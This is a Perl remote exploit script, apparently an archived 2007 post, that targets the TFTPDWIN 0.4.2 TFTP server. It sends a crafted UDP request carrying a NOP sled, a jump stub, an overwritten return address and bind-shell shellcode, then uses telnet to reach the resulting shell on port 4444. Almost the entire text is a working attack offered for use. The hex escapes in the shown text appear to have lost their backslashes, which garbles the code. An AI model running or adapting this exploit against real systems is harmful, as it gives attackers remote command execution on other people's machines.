tftpdwin042.txt
Posted on 16 January 2007
#!/usr/bin/perl -w use IO::Socket; if(!($ARGV[1])) { print "Usage: tftpdwin-0-4-2.pl <target host> <port> "; exit; } $victim = IO::Socket::INET->new(Proto=>'udp', PeerAddr=>$ARGV[0], PeerPort=>$ARGV[1]) or die "Cannot connect to $ARGV[0] sulla porta $ARGV[1]"; my $nop0="x90"x15; #8BC3 MOV EAX,EBX #66:05 1201 ADD AX,112 #50 PUSH EAX #C3 RETN my $asm="x8bxc3x66x05x12x01x50xc3"; my $nop="x90"x57; my $nop1="x90"x7; my $eip="x42xfbx61x40";# pop ebp,ret in tftpd.exe #my $eip="B"x4; #A binary translation of NGS Writing Small Shellcode by Dafydd Stuttard with only two little differences #1)bind port, in this exploit is 4444 in the original shellcode was 6666 #2)4 bytes added to the shellcode in order not to see the window of cmd.exe on remote host $shellcode = "x59x81xc9xd3x62x30x20x41x43x4dx64". "x64x99x96x8Dx7ExE8x64x8Bx5Ax30x8Bx4Bx0Cx8Bx49x1C". "x8Bx09x8Bx69x08xB6x03x2BxE2x66xBAx33x32x52x68x77". "x73x32x5Fx54xACx3CxD3x75x06x95xFFx57xF4x95x57x60". "x8Bx45x3Cx8Bx4Cx05x78x03xCDx8Bx59x20x03xDDx33xFF". "x47x8Bx34xBBx03xF5x99xACx34x71x2AxD0x3Cx71x75xF7". "x3Ax54x24x1Cx75xEAx8Bx59x24x03xDDx66x8Bx3Cx7Bx8B". "x59x1Cx03xDDx03x2CxBBx95x5FxABx57x61x3BxF7x75xB4". "x5Ex54x6Ax02xADxFFxD0x88x46x13x8Dx48x30x8BxFCxF3". "xABx40x50x40x50xADxFFxD0x95xB8x02xFFx11x5cx32xE4". "x50x54x55xADxFFxD0x85xC0x74xF8xFEx44x24x2DxFEx44". "x24x2cx83xEFx6CxABxABxABx58x54x54x50x50x50x54x50". "x50x56x50xFFx56xE4xFFx56xE8"; $exploit = "x00x01" . $nop0 .$asm.$nop. $shellcode. $nop1 .$eip. "x00x6ex65x74x61x73x63x69x69x00"; print $victim $exploit; print " + Malicious request sent ... "; sleep(2); print "Done. "; close($victim); $host = $ARGV[0]; print " + connect to 4444 port of $host ... "; sleep(3); system("telnet $host 4444"); exit;
